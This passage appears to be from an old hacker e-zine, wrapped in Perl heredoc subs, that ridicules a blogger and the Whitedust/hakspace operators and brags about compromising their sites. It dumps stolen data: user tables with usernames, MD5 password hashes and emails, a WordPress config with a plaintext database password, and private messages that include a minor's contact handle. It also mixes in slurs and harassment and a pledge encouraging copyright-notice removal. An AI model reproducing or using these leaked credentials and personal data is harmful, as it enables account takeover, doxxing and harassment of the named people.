I've been using computers for over 10 years now, and my main interest is
in networking and security."
Obtained from http://claimid.com/cypherxero
He sure got popular with his "hacking e-zine" called "Exploit this!".
Where he introduced us with elite never by then seen
techniques for BOF attacks, SQL injections, XSS, SE'ing and ARP poisoning.
Thank you so much for the enlightenment, I'm sure it took you
quite some time to rip off code and read 9120083495823 small txts to
assemble that ...zine.
Not only that he was good at writing "educational zines" he was also an
amazing coder; take a look at this wonderful and useful perl script:
#!/usr/bin/perl -w
# XML Weather
# http://www.cypherxero.net/bin
use XML::TreeBuilder;
# NWS XML Feeds
# http://www.nws.noaa.gov/data/current_obs/
# Select your local XML Feed (NOT RSS!)
system("echo Parsing XML File...");
# ---------------------------------------------
# Change XML Feed below for your local weather
# ---------------------------------------------
system("ftp http://www.nws.noaa.gov/data/current_obs/KMOB.xml > /dev/null
2>&1");
system("clear");
# --------------------------------------------
# Change the basename of the XML file here!
# --------------------------------------------
my $file = 'KMOB.xml';
my $tree = XML::TreeBuilder->new();
$tree->parse_file($file);
foreach my $weather ($tree->find_by_tag_name('current_observation')){
print $weather->find_by_tag_name('location')->as_text;
print " (";
print $weather->find_by_tag_name('station_id')->as_text;
print ")\n";
print $weather->find_by_tag_name('observation_time')->as_text;
print "\n\nTemperature: ";
print $weather->find_by_tag_name('temperature_string')->as_text;
print "\nWind: ";
print $weather->find_by_tag_name('wind_string')->as_text;
print "\nPressure: ";
print $weather->find_by_tag_name('pressure_string')->as_text;
print "\nHeat Index: ";
print $weather->find_by_tag_name('heat_index_string')->as_text;
print "\n";
}
Yes, he introduced system("echo ") to the programming world! Such
cleverness was never seen before in the history of programming.
He also shows us how to use useless amount of print's to surround
text with parens and how to use new lines the elite way!
Also his bash is amazing, take a look at this useful bash script:
#!/bin/bash
# Builds a table of hashes and the words that make the hashes
# Uses a wordlist of any kind!
files="`cat $1 | wc | awk '{ print $1}'`"
files="`expr $files + 1`"
linenum="1"
NUM="1"
echo "Now hashing the wordlist..."
echo "This could take awhile..."
while [ "$linenum" != "$files" ]
do
word="`sed ''$NUM'q;d' $1`"
hash="`md5 -d"$word"`"
echo "$hash $word" >> $2
NUM="`expr $NUM + 1`"
linenum="`expr $linenum + 1`"
done
echo "DONE!"
exit 0
In this script Mr. cypherzero shows us how to quote variables in bash just
because that's the elite way foo.
And that proper tabbing is just lame in bash.
He never get to post his C/C++ programs we can only wonder how elite they
could have been.
He was a great exploit developer his eleet sql injections made it in
milw0rm, SecurityFocus and much more places, and he felt so proud, just
look at him.
Post from 1:
Title: They sent me 'round the net
My SQL Injection is making it's rounds all over the internet, and I feel
great that I finally got an exploit (my first of many!), and it's crazy
some of the places it's at now. Here's a small list:
<ul>
<li>milw0rm</li>
<li>SecurityFocus</li>
<li>National Vulnerability Database (NIST.gov)</li>
<li>SANS Internet Storm Center</li>
<li>Internet Security Systems XForce</li>
<li>SecurityReason</li>
<li>SecurityLab</li>
<li>Sla.ckers</li>
<li>EliteHackers</li>
<li>Joomla</li>
<li>Phil-Taylor</li>
<li>Mambo Server</li>
<li>and much more!</li>
</ul>
Comment from Eric B:
I didn't know you had that credited to you, I thought you were just using
an known exploit on that certain someone's site. Crazy man.
Yes like a kid in a candy store, just that in this case the candies are
the ego-boost and he got it for being such a good boy for reporting a
vulnerability.
He also loved perl, but unfortunately perl didn't love him back thus the
crappy code that made us cry :(
Post from 1:
Title: Rewriting fuser for perl modules
I'm going to be rewriting the fuser shell script to handle the download,
compile, and install of perl modules. (from repositories such as <a
href="http://www.cpan.org/">CPAN</a>)
Oh, and perl kicks ass. If I've learned one thing, it's that I cannot
STAND languages like Java. It's way too bulky and crappy, and for the
things I want to do, shell scripting, perl, and eventually C will suit me
and my programming needs just fine. I'm not out to write a huge
application, but rather tie concepts and code together into small, usable
code.
UPDATE: OK, the fuser for perl (fuserp) script is ready for use! Grab it
<a href="http://www.cypherxero.net/bin/scripts/fuserp">here</a>.
Cypherzero sure knows how to secure php applications, especially
commercial software such as wordpress so retarded script kiddies can't get
him.
And even if he missed something he can always blame his hosting for being
lame and not patching their vulnerabilities like any good whitehat would
do.
But unfortunately the evil hackers put so much pressure on him, so he
rm'ed his whole site and his domain doesn't have any DNS records :(
We are sure going to miss his whoring and we'll cry day and night because he
didn't make in the media, guess your whoring wasn't good enough *sniff*
Perhaps someone should take cypherzero's example and do the same before
the evil haqurs get them and embarrass them publicly?
Anyway we were nice enough to provide hosting for cypherzero's blog. It's
just a bunch of .txt's of his posts and comments. Please visit
http://cypher0.h18.ru
Now for some useless hash dumping
admin:25cbe13e867343276018d39cfbaabb4b:cypherxero@gmail.com:http://www.cypherxero.net/blog/
psycho:daaaf13651380465fc284db6940d8478:james@psycho1.com:
binary:b73c312ea8b21ff8b85f0b1fd4678384:binary@lockergnome.com:http://www.podcastcorral.com
wally:721c5c5d933eeb6ff2fe39be384abda9:wally@hiddenpcmaster.com:http://hiddenpcmaster.com
Bridget:fe3178e4b7f3638ebf468f1e8f9a809e:tvguide@gmail.com:http://bridget.tomcort.com
tcort:449884d825dc41836cbdf026892220c6:linuxgeek@gmail.com:http://mediumbagel.org
M1k3FTP:33970a86eac8055edcf6dfaea582a0ce:M1k3@MikeFTP.net:http://www.MikeFTP.net
apex:6eb80f40f424f251b7c5b087a4307d88:apex.81@gmail.com:www.apex81.tk
tk422:fff2171ad4d427aa9501b1c68a06931a:jedikillerjango@gmail.com:
siliconsnake:f955984cc51135116fee1e9d49720ccc:trent@subzerolan.com:http://snake.destyni.com
NasMatic23:1e827fcb4f24791c5582ec15b8df378f:RFTheKnicks@gmail.com:
shane:3df5e5bd22bbdb70bce1b604f462935b:shane@computerhelpforum.org:http://computerhelpforum.org
the_d:93f298d0557fc3d308e0cc35d6dcad18:thedtenaciously@gmail.com:http://fastboot.com/wordpress
oly:d141f75795c7d7a224c0423ebd221dc7:ericjolsen@gmail.com:http://www.ericolsen.net
tetsujin:5118394f28be1c11f7322ab20540cf0a:tetsujin420@bellsouth.net:http://s4m.textamerica.com/
Strawberry_Princess:02ac744dfb23cc201993425c48d1f2d9:null@yahoo.com:
Poe:6c88beb3367ac44b2b812550c773af84:fakenamefakename@yahoo.com:
cerealkiller76:484afee48c8de6ac98e6a27b1ff98fc1:cerealkiller76@gmail.com:http://cerealkiller76.blogspot.com
magikgrl:5f4dcc3b5aa765d61d8327deb882cf99:magikgrl@gmail.com:
truckercap:3930881fce57482bde17eb7cc15456a2:truckercap@electricjesus.net:http://Electricjesus.net
geekboy:831e64f8576b96c0e3bc3d7ff0df7d86:joshbucket1@joshkuhn.net:
sligh:5f4dcc3b5aa765d61d8327deb882cf99:bobsligh@gmail.com:
redredkroovy:b3646a5da085295d2ca5dd26dd6c06c4:redredkroovy@gmail.com:http://www.txmegabites.net
crazy24hraday:569e44e4809b4d0ae43251bf5fa6a67d:garren@gmail.com:
Mogwai:a616e565c11d6f090526a89bb01ee68b:tchaplin@gmail.com:
syber:19876fc50e51ba427418f884ba64c288:syber@cogeco.ca:http://www.digital-burn.net
wyckedone:1527ba13c84b078b056ed0591001f529:wyckedone@gmail.com:http://www.wyckedone.net
UserName:5f4dcc3b5aa765d61d8327deb882cf99:eric@eric-b.net:http://eric-b.net
Pilgrim:85f81759a9b3a4be6362416f89d534ba:billy_whazzup@hotmail.com:http://www.fewleftstanding.net
cyberaxe:bfba25c6dd75f594c4320bf912141353:joker0@gmail.com:
lisss001:ea908d1a99007cb5b85d64d70bf08326:lisss001@medway.org.uk:
Khabi:49f154e0a49360fcc6c1952d0e2acf1b:iam@slightlyderanged.net:http://www.slightlyderanged.net
tinman:e1c78028358076445e69102c6ff7eed6:tinman2k@gmail.com:
NEUR0vanity:2968211a15bfb296265b5e32afcc4496:nv@neur0.com:http://neur0.com
darkfusion:25fd9986364ebe48bebc13a884d12f57:darkfusion@gmail.com:http://wiredtech.litehedded.com
M1k3:cbeb297e821e1a382ca1d30e0abbcf13:mbcomp@gmail.com:
marklar:b0283e5dceabcdc4574628bd4bf4ffdb:marklar@dodgeit.com:
bcumms:5f4dcc3b5aa765d61d8327deb882cf99:bcumms@hotmail.com:
Bobo:bf949e1a46b77066be3a26ee6b6fa82a:craftonk@bresnan.net:
togs:8ef2ccab4b6d7dc48ed5bb053d114d95:ctognela@threedd.com:
rabbit:5a5beb64f54ffd49e550c2b0ab74ec76:rabbit2k@gmail.com:
ComFuLogiK:f7a0f338a9e831896177ccbd7ddb8f57:jfetzko@sbcglobal.net:
roumen:4dbaedd11f42b722ec71c9600cfd7947:roman.strobl@sun.com:
rdm:8b576e3fc65045936dfbea4e206dbb26:russ81@ptd.net:http://rmmweb.net
door33:b991b5881c811edbd90ed12c2a316cb9:frank@slickcode.org:http://door33.sourcehack.org
ilselu1:3c497915ed0371a16b9a760810606c20:ilselu1@gmail.com:
ZeratulsAvenger:bd07d4d09613b506e4ac565402972de0:zeratulsavenger@hotmail.com:
beta:ee3f7b3ce2d750c44b86d8caee326e9b:betanerd@gmail.com:http://www.betanerd.com
shoebox:249783e0c78d0bdc4c4df862270a48bc:shoeboxthedog@gmail.com:
Muraii:49a1b76eb0b47571f00995850a8657b4:muraii@yahoo.com:
willsnake:ec209a86bffe962690db18401a02deaf:willzsnake@gmail.com:
42091_ickim:176030a44e94b7261e894b1b5fea718b:yardfarmer1957@bellsouth.net:
StivRichardOff:142cf045581ed681bd2569d6526e2d29:meta2zz@gawab.com:
bigHogPidors:afa0080e9463be35600fd250c0d65ebf:titelwey@mail.ru:
// ** MySQL settings ** //
define('DB_NAME', 'dshadow_blogdb'); // The name of the database
define('DB_USER', 'dshadow_wp'); // Your MySQL username
define('DB_PASSWORD', 'th3w0rld15m1n3); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change
We can continue bashing cypherzero for each and every post he made on his
blog and that would be a useless waste of space.
So we'll just let him bash himself. Visit http://cypher0.h18.ru for more
lulz.
EOCYPHERXERO
);}
sub ZAP { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOZAP'
-- Introducing ZAP --
Have you ever been in a situation where you based your code
off of another script, yet you didn't want to include its
accompanying copyright notice? Then this is for you.
In this case, you have three options:
a) Include the notice, because you are lazy and legal.
b) Rewrite your program from scratch, because you want
your due creative recognition.
c) Simply not include the copyright notice.
These are also known as:
a) The lame way.
b) The ego way.
c) The elite way!
There are various reasons for choosing c. Perhaps you find
that if you were to start your code fresh, it would be
similar in expressions and control to the code you had
before. Further, they would probably do the same thing in
almost the same way. Doing so does not seem fair to you.
Additionally, by including the GPL in your modified program
you have essentially waved moral rights to the code. You
have signed the code over, so to speak, and have willingly
withdrawn your rights to it.
You might feel a bit ripped off. Afterall, perhaps your
code is a greater derivation, in both form and concept,
from your source than that source is from its influences.
A more practical reason exists: Perhaps you hate long,
annoying comments from others in your tool, and heck, you
are an evil hacker who isn't going to let copyright law
alter your practices.
The GPL is one example of a copyleft notice that seeks to
limit some freedoms to ensure most freedoms. As nice as the
GPL is, for any of the reasons above you may not wish to
abide by its rules. The GPL is not full of loopholes:
rather, every new version is like the next Terminator, only
stronger. It's out to get you and you cannot stop it. I
knocked a copy of the GPLv2 into molten steel; it came out
squeaky clean.
If you decide to basically violate the law and not include
a copyright license, you may wish to offer some explanation
for that choice. Thus, we present ZAP.
-----------------------------------------------------------
| |
| ZF0 Anti-copyright Pledge (ZAP) |
| |
| |
| 1. This code may or may not be derived |
| from one or multiple external sources |
| with or without express permission. |
| |
| |
| 2. We reject the general universal applicability |
| of software copyrights to all cases based on |
| any combination of the following: |
| |
| a) The vagueness of the Agreement on Trade |
| -Related Aspects of Intellectual Property |
| Rights in the area of software rights. |
| b) The lack of cohesion of different |
| national copyright legislation. |
| c) The lack of originality in software and |
| the lack of establishment of originality. |
| d) Further personal opinions. |
| |
| |
| 3. We reject the assumed right of verbatim |
| copyright control over all revision. |
| |
| a) Particularly in free software, a copyright |
| serves as recognition and little else. |
| b) We will extend recognition as we |
| feel it is deserved, and not less. |
| |
| |
| 4. This statement does not attempt to |
| serve as a legally binding document. |
| |
| a) This notice is an explanation, not a limitation. |
| b) These are terms of release, |
| not conditions of use |
| c) This software is thus provided as-is |
| without any guarantees or warranties. |
| |
-----------------------------------------------------------
You are free (of course, how could we legally stop you?) to
use this. You could include it directly, or even just say
something along the lines of "See ZAP for copyright terms"
or "Released in concurrence with ZAP principles".
EOZAP
);}
sub Whitedust { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOWHITEDUST'
==intro
<psg> Why are you trying to prove shit to me? You hate me for no reason?! :)
# All IRC quotes taken from conversations not including ZF0 members - we
wouldn't IRC with psg
In ZF02 we had a Call For 0wning in which we detailed how Mark Hinge, aka
psg, aka |PaRiS|, aka Voshika, aka any other gay nick, needed to be owned.
Allow us to tell you a little story of how he and his bum buddy Mark
Anderson (aka Cronus) got owned through the roof. We call this story "Two
Marks don't make a Right".
These two young fools spent the 1990s pretending to be hackers. Cronus was
a lead contributor to the Discordant Opposition Journals (DOJ), which
never produced any technical content. psg contributed to the Syndicate of
London Journal/Annuals (soljo, maybe "solja" was too feminine for them),
which also has not produced anything intelligent. However, these two
wankers wave their journals around as their hacker cred. Collectively we
may refer to these two, and their chav friends like fwaggle, steinsky,
and chickensoup, as the Syndicate of London (SoL).
We are unable to find any period in time in which SoL actually did
anything. As far as their written record goes, it seems they claimed to be
hackers, and then wrote some shitty zines talking about how they were
hackers. I term these men "fake hackers"! Seriously, they knew how to type
and how to use the internet in the early 90s. Congratulations fucktards.
Let's flash-forward a few years. Enter 2005. They still hadn't
accomplished anything. But then Cronus (that's Mark Anderson, in case you
have forgotten already!) decided to make some money off of being a fake
hacker. So he put the capital behind whitedust.net and got psg (Mark
Hinge) to be the lead bitch. It was supposed to be the world's best
independent online security news source. However, it completely lacked
legitimacy. The Marks did not actually know any real hackers, and could
not be ahead of the pack for news. They became resellers and relinkers of
news that appeared on other sites. They would also try to create news or
add unoriginal commentary to try to appear unique. They also tried to
support unprofessional news items to get more hits, and would desperately
attempt to get slashdot and other sites to link to them. They wrote their
own Wikipedia articles about themselves to try to increase their profile.
<psg> and *I* "mispresent hackers" <- sure do
Whitedust has never been taken seriously by hackers (except those of us
who were serious about owning it!)
From then to now they have only become worse.
Just to clarify, we are not among the groups accusing SoL of "selling
out". They never had anything to sell. Had they been talented, hell yes
they sold out!
The fake hackers searched desperately for ways to make money off of being
fake hackers. They started hakedspace, err, I mean "hakspace", a
myspace-like site in an attempt to lure the 13 year old virgin fake
hackers of the internet to generate ad revenue for themselves. They took
all of their shitty content over the years and put it into a book, and
have desperately tried to sell a copy.
They tried to host a hacker conference in September 2007. As we have seen,
that didn't happen.
The SoL are trying as hard as possible to make as much money as they can
off of kids and/or php coders who don't know enough about hacking to
realise how full of shit the SoL are. These kids will find themselves
mislead and not provided with quality information. These kids will start
to think they are just as hackerific as Cronus and psg, while really just
learning how to be just as shitty.
<psg> I am not a hacker... i am a marketeer.
That quote is refreshingly honest. It would be more pleasing to see it on
the "About" page of Whitedust than in a small IRC chat where it may not
have ever been repeated.
Now psg tries to backtrack and be like "I wasn't actually aware any of
the wd staff ever claimed to be hackers anyways". Let's see if I can
think of any examples...wait a second, how about that time you wrote
your own Wikipedia article, and then put yourself in Wikipedia's
category "British Hackers"?
Check it: http://en.wikipedia.org/w/index.php?title=Mark_Hinge&oldid=69843817
==fresh
So, shortly before our release, SoL found out they were owned. But they
are still fuckin' hilarious with how they try to deal with that. They
wrote a self-deprecating post for the sites.
Their big ace in the hole was that they had some emails with KODD. See,
after KODD owned them, KODD was contacted for some purposes. Now, SoL
claims that the KODD email had actually been expired, and after the own
SoL picked it up. Maybe that's how it happened. Yet, I think you'll agree
that that was unlikely and is probably just another lie. First, it takes
time for hushmail accounts to expire. Second, if that was true, and they
had just stolen the account from KODD, then the only way KODD wouldn't
know is if they never even tried to log in. Despite making a defacement
and passing around the email, would they really not check it? Doubt it.
Would they not change their website to indicate a new email? Doubt it.
It is more acceptable to conclude that either KODD got pissed off that
whitedust was owned without them, and then passed the emails to WD; or
that KODD has some serious overlap with the SoL core, and/or directly
*is* SoL, vis-a-vis the '99 days.
Either way that is the risk you take when you share with other people,
and that is a risk that was well prepared for. WD doesn't really mention
it, but those emails did not contain any compromising information.
"Chest-beating" existed to obfuscate vagueness.
So basically the entire post was a story leading up to their great trump,
the emails!
How they dealt with the own is just funny. In order to make our work
seem less impressive, they started detailing just how many times they
know they have been hacked. It was like "$A hacked us through phpizabi.
Then $B hacked us through phpizabi. Then $C hacked us through phpizabi
and defaced us. So then we figured it was time to stop ignoring our
lack of security. And then $D owned us through completely unguarded
input. So $E really isn't that special."
It gets more hilarious as they failed to realise how big the problem was.
Despite the email clearly saying that we had owned Whitedust itself,
they simply didn't get that when we own we 0wn. They wrote their text
without realizing that we could destroy them in any number of ways at
any moment in time.
It's easy for them to blame phpizabi or to say that psg was the victim
this time. What they need to realise to survive in this world is that
every single person along the line failed them. They have security issues
at any level you can have an issue at. They barely have a grip on XSS,
let alone an idea of how to handle SQL input or other user-defined input.
They don't know how to manage or maintain the integrity of files. They
don't know how to design things to limit the damage from a single breach.
They don't know how to find secure web applications nor how to write
their own. They did not do a single thing in all of our research that
impresses us. We will detail or hint at much of these issues below, but
many of them will stay with us as our own personal collection of
Whitedust 0day. The first thing they could do to help the problem is
scrap WD3 entirely and hire someone competent to make a fresh CMS.
And, jake, you stupid sheep-raping wanker you, it was CF0 and ZF0. With
zeroes, not O's. Get it? Zero for 0wned? The 0 means 0wned? Right? Right?
Fucking retards. On with the show.
==hakspace.net
Hakspace is the place to start, simply because it was very publicly
humiliated. Basically the Marks decided to use a very shitty piece of open
source software as their lame management system. This LMS was full
of hilarious holes. It didn't take us any time to own it and find
ourselves exploring. However, this is not anything to brag about, since a
few other groups or individuals have done the same. One group, the
Knights of Dynamic Discord (KODD), decided to deface the website. See
their text at http://kodd.66ghz.com/18.txt.
Cronus and psg were so stupid that they either didn't bother taking a look
at the LMS they wanted to use to power their hakspace, or they simply were
too incompetent to see how poor the code was. Either way they deserved a
good owning, and that's what they got. There is no need for us to go into
much detail in this area.
After hakspace got owned:
[ WD Manifesto ] "From this point on we will not indulge in juvenile
destructive squabbling that plagues the web"
[ ZF0 roffles ] "Yes you will, just on the losing side!"
Let's have a small tour through their database from before the defacement.
########################################
INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`,
`subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('16', '10',
'32', '
', 'To: xjessicax Hey!', 'Thanks for adding me as a contact.
While my profile says 30 something, I'm 16 as well, and I
wouldn't mind getting a chance to talk.
IRC or AIM sound good?
-zach', '', '1175887522', '1', '1');
########################################
Check it out, zach is not really 30, he's 16 for the purpose of hooking up
with xjessicax!
If you want to cyber her aim is xjessicaislegend (the reply was favourable
to zach's cybering attempt!)
########################################
INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`,
`subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('27', '88',
'1', ''
, 'Re: you have been busy', '[quote]
congrats. Hakspace looks good so far.
Is there anything I can do to help spread the word?
[/quote]
Tell everyone you know.
Invite everyone you know.
Post it on forums.
Submit it to Slashdot until they give in a post it! :)
Cheers,'
########################################
psg has such smart Slashdot manipulation skills.
########################################
INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`,
`subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('52', '4',
'7', '',
'To: QUEEN Hey.', 'You seem to elude me a little bit.
You seem, to me, to be mostly a dominatrix style
mistress-of-hatred-and-pain.
Now, I guess this leads me to wondering where in the "hacking"
category you fall under. # <- that is not what it gets us wondering
What is your definition of hacking?
I'm just curious.
:)', '', '1178209412', '1', '1');
INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`,
`subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('53', '7',
'4', '',
'Re: Hey.', 'Firstly I am not a Dominatrix, I am a lifestyle Domina. I am
a sadist who enjoys the BDSM way of life.
I am a loner, a weirdo, a freak. I have few RL friends. I like it that
way.
I spent 3 years of my life in hospital. I always love computers when I was
out..
My computers/s are My life. I quit my business degree to study programming
and software engineering.
I was heavily involved in warez and fxp for the last 8 or 9 years. I did
not want to be a script kidddy. I wanted to learn to code. Coding,
scripts,
computers suit my mind.
I will not claim any elite skillz beyond my passion.
I will always prefer computers to people. I will purse my major and then
continue with computer engineering, assembly is of particular interest.
Consider me below your standards.. its not what I am woried about.
I have passion and a lust for learning and mnay years to make up for.
QUEEN
INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`,
`subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('56', '4',
'7', '',
'Re: Re: Hey.', 'Huh.
Well said.
I guess I never pinned you as the computer science sort of person, but I
guess that goes for stereotyping. My apologies if calling you a
dominatrix
offended you, I'm a wee ignorant on the subject and I'm not
sure if there is a distinction I'm unaware of.
Elite skills seem to be something born in movies and book. People are
only as good as the things they do regularly and the fabled
d00d-can-get-into
-anything is so elusive I doubt the existence.
In your statement, "Consider me below your standards" I hope you
don't
mean me, personally. I'm afraid my message may have seem
ed hostile. It wasn't intended to be. I merely sent the message
from boredom at work and curiosity since I haven't really talked to
you
before.
Are you going to school for programming, or is it just a hobby?
What languages are are you experienced with?
Which languages are you a novice with?
I suppose it wouldn't be fair to sound like an interviewer, so
I'll say a little about myself.
I'm commonly known as Comrade Smack, though people who know me
personally call me XaQ (pronounced: zuh-ack). Information Systems
Security is m
y thing and I am going to school for it. I'm 20. I'll be
getting an associates degree in June for Computer Networking and I'll
be g
etting a Bachelors in Information Systems Security in June 2009. I work
at a retail store as the IT department. I have my own office, it's a
pretty sweet rig (pictures coming soon).
I currently have a few projects going. One seems to be a large step in
the direction of Hacktivism, another is just "the next MySpace."
The first one has to do with using steganography with network traffic,
details I can't really go into. I don't want to compromise the
mis
sion. The second one isn't a social networking site, but I think has
a niche that should allow for massive expansion, though I think I'm
keeping it "underground" via invitation-only and amongst
friends. <-- Check out his elite hacker projects
I guess I'm bored at work again and felt like chatting.
-Comrade Smack "XaQ" Tacular <-- Comrade Smack can now pick up
lots of girls since he is in cDc-NSF
########################################
^ That's just funny.
Now time for some hashes! Here are the hakspace.net lusers from before the
defacement.
psg', 'e7e9f43efcb7f72bca72aad5b79b7847', 'psg@cdc.nsf.com',
narcotic', '69f1cc5a16638c0dfbc583c9b5798297', 'douglas@qu4ck.com',
Swordoath', '1f90c3c0b4a54825c7e2ebd938dbadb1', 'Sulock@gmail.com',
Ender', 'c909baa24666b7324e249cea04b311aa', 'axandalite@hotmail.com',
riscphree', 'e10adc3949ba59abbe56e057f20f883e', 'riscphree@gmail.com',
zPr', '617e1b5742522efda897ec532e09882c', 'shaitanx@gmail.com',
QUEEN', 'a9f52634ba775a5c2baada52988107d0', 'info@rubberqueen.co.nz',
skapixie', '358c242447244cce5aa241e00cc3885f', 'lorz52@hotmail.com',
Smack', '4d86b29292a7402d5b3f71343047214b', 'smackt@gmail.com',
shaman', 'bed128365216c019988915ed3add75fb', 'jon-hakspace@planzero.org',
xjessicax', 'ddd956c117486cba6efef9fcc4c38549', 'todreamofautumn@gmail.com',
claustro', '61ec9201ca32d4cb541441c454aa2cc6', 'ma_gerrer@yahoo.de',
LEET', '3b0729efc5953de90b519246085bdd01', 'rosenburgbobby@hotmail.com',
Fanta', '7cb614b87fb376583c98944293fd983c', 'fantaloonastic@hotmail.com',
naxxtor', '3dc69416b0783cac9f3dda37b6bb0862', 'naxxtor@naxxtor.com',
Luke', '9d2df5a492765f03fca897a06c0be9fd', 'shaggstarr@msn.com',
HellzUK', 'd8578edf8458ce06fbc5bb76a58c5ca4', 'jswray@hotmail.com',
dfa', 'c0ba9fe956a08dabe9df09e3b0d71276', 'deathfromafar@code-monkeys.org',
Tidus', 'e0f9609e3728136571be14d60e76d4ca', 'tidus333@gmail.com',
ckopacsi', '7241a98997b6f00f29716b86ce4466ac', 'ckopacsi@yahoo.com',
libertate', '8993c542ca1d8a4fa3630d47ed548107', 'libertate_@hotmail.com',
eris23', 'adfae8dd0b15b0c584af67735fb9e704', 'jdkatz23@gmail.com',
bawb2', '10a015a9cd71995e3c510bd00768e66b', 'bizzawb@gmail.com',
drache', 'bb562a650bfc24b6fc64e746ee65c8c3', 'me@grog.mine.nu',
fuser', '3123b5594d76d6ba67e7985f5d0ea411', 'hadri90@gmail.com',
talnprime', '8b65996657feab900109f216f4b951b6', 'talonprime@gmail.com',
sivakrish', 'b2f7d6e27829d7da30ab470e11a67a6e', 'sivakrishna123@gmail.com',
l0gic', '161a09bd22c4a05b3fd96382fac46995', 'l0gic@l0gic.net',
bhninja', 'fa6836be737073c2dd94f73e62496ea5', 'jdrewm@gmail.com',
terminal', '6c3be46e5ec46fba63e8a423fc6dd4e9', 'firespeaks@yahoo.com',
bky', 'fc4e582f933a07bd3e5746f9eb5a80f6', 'bkystarfleet@gmail.com',
krovisser', '5416d7cd6ef195a0f7622a9c56b55e84', 'nick@selfunaware.com',
XiTDiS', '1404834e52a4c6cac9444f1fb3c62d3c', 'blueeyez112@yahoo.com',
DaMacc', 'c80805b69106298d5cc5ecc02c6171a4', 'elquinte@gmail.com',
LiX', 'b369b8022e21e83d7f2ee375b2a54971', 'lix@valvesoftware.co.uk',
kingofall', 'eb89f66c39c270c05f008c38f3ce39b8', 'king_of_all1@hotmail.co.uk',
transend', '42a53c990a1075e82a61bf0a7a5ac812', 'transend@dcemail.com',
Tzunamii', '7009a1360ccbf034f391872fae01a8be', 'tzunamiii@gmail.com',
mbalboa', '19462fa8ea158e21f53ead18b458ec16', 'mbalboa@gmail.com',
limeyhaqr', '7e3eed005a0edafba5da7fe573e3bf16', 'limeyhaqr@gmail.com',
emonk', '82f0035fbb0c2ef33b1b672b82410fdd', 'root@quicksilverscreen.com',
gator50', '3d04dacf96ba524b32d037bc9c8c7ccc', 'acidpains@aol.com',
Brok3n', '4f327b59dafbe24f8cae197d6aa31e56', 'Brok3n_5w0rd@hotmail.co.uk',
Augustus', '352188e31495f29989ac7ceeb3f91dc1', 'vq42tf03k8m1z7y@temporaryinbox.com',
netf1r3', '21b714346434f88c8a64f164b4162ad8', 'netf1r3@byte-error.com',
shazaum', '4c7134c470ba60d2137278c260777da3', 'shazaum@gmail.com',
Netduke', '406b8494aebf3163c059a733fedfca2d', 'netduke@gmail.com',
renakuzar', '78d48a2ab51f927c079bda1bed7a4d1d', 'renakuzar@yahoo.com',
adastra', 'a8e4f703f5298c1876e07a630dc9d6d4', 'jewuviha@mailmoat.com',
ponchio', '6c51415c108a188411970154b60ee3b4', 'ponchio_69@hotmail.com',
michelper', '2aee1c40199c7754da766e61452612cc','michelpereira-hakspace@gmail.com',
Xenocide', 'da197b6961afb3f963f66e20c6ea1b7a', 'xen423@gmail.com',
enigm0r', '6c29e9cc4042d972b15ff0304e636886', 'dbuckwalter@gmail.com',
_X_', '9cf0fad66f27ca22b7ee721d5413ea62', 'mreckz@users.sourceforge.net',
ReVoLT', '80ae98c5020864ffa34e695d784f9b97', 'revolt0163@hotmail.com',
pingwin', 'dc56bc33e196d040032d060be72a659e', 'pingwin@gmail.com',
wangmm', 'b50aea55b0916e54a95fe1e2cb236359', 'wangmm@gmail.com',
FreakyKid', 'cea46d12b67dc9e39b406f5fed6f3f2b', 'seg_fault@rogers.com',
Dimmae', '2506da4c95f2d1e78c1b597c879d91c9', 'dimmae@gmail.com',
Zakolus', 'e559a8e8404d94586b3ab25059ffe91c', 'zakolus@gmail.com',
Felonious', '11a7f956c37bf0459e9c80b16cc72107', 'mrchesnutt@gmail.com',
fuzz', '7aabd294bd89be4256e932c34609b671', 'fuzz@missouri.edu',
prs', 'e6b25291f1ae97f52a70f08bd245b456', 'hakspace@forensix.info',
sado', '90bcb9dc73b614d0a5bdca71198b2a84', 'sadistic0ne@yahoo.com',
slappy', '293cb6af8d9939b04d3980e3ea6e4055', 'brandonfungus@hotmail.com',
father', '0d19b46d1818223ce51bea65d3775d88', 'fatherlaptop@gmail.com',
SH1R7_GUY', '21af0671b5f06ed531a9c5c44fb4f57d', 'sh1r7guy@hotmail.com',
HackerJax', '4ab3a53629d8013ac8b105f976fad9f8','matthew_dozier@csumb.edu',
lferette', '76c07f8905c4282170453c1e4c1c3805', 'lionel@ferette.net',
snid', 'b4d92944c7a9a90cc60a89ddeaa938cd', 'xsnidx@gmail.com',
rafi', '552fa99dc520c6590e2251f95c5ba01a', 'rafi@openu.ac.il',
sol', 'e7e9f43efcb7f72bca72aad5b79b7847', 'paris@soljo.org',
Kussic', '68de7d90df7867309d9b8ae4fb39c4d3', 'dotari@mac.com',
Belial', '7e59cb5b2f52c763bc846471fe5942e4', 'b3l14l@gmail.com',
Vesalius', 'cf6ba6acf6b315448d10ead50eb4a8fc','ollie@whothehellareyou.info',
fbicudo', '245fa9ddf2c4e71acb2a939b953dc193', 'fbicudo@gmail.com',
fenrir', '3adc6d0d78fc14e9037d469e80c36b83', 'willlobo@yahoo.com.br',
st3x', 'e9f1e0b13b8a60d76bd23d3e11f3de75', 'st3x@hotmail.com', <-- this guy big psg fan
idsguy', '8b2680de52c6aecc0547dab63272962e', 'ntxpla@gmail.com',
k3ys3r', 'bd564cea7e9c983eb4a63e88a9a49406', 'jacktrice@gmail.com',
x4e', '4ca6b00c0eac493f54032c99098c4be9', 'x4e@x4e.org',
liquidfis', 'a99f847e5dbe676070c86a0cc377b594', 'liquidfish@gmail.com',
r00t619', '2b781b373d7775f4047d9c82f9174a80', 'r00t619@gmail.com',
